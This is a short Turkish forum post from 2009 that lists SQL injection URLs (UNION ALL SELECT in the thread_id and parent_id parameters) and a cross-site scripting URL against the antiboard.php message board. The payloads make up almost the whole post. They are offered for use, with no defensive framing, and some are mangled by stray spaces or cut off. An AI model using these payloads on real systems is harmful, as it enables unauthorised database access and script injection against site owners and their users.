Bazı web site açıkları:
Çok basit bir sistem içinde birçok sql injection ve cross-site scripting açıkları var.
/antiboard.php?thread_id=1%20UNION%20ALL%20select%2 0field%20from%20whatever--&mode=threaded&sort_order=
/antiboard.php?range=all&mode=threaded&thread_id=1& reply=1&parent_id=1%20UNION%20ALL%20select%20field %20from% 20whatever--
/antiboard.php?range=all&thread_id=1%20UNION%20ALL% 20select%20field%20from% 20whatever--&sort_order=ASC&mode=threaded
/antiboard.php?thread_id=1&parent_id=1%20UNION%20AL L%20select%20field%20from% 20whatever--&mode=nested&reply=1
XSS attack :
http://../antiboard.php?thread_id=1&mode=threaded&range=&fee dback=< script>alert(document
Konu: Bazı site açıkları 
C.tesi Ocak 10, 2009 7:39 pm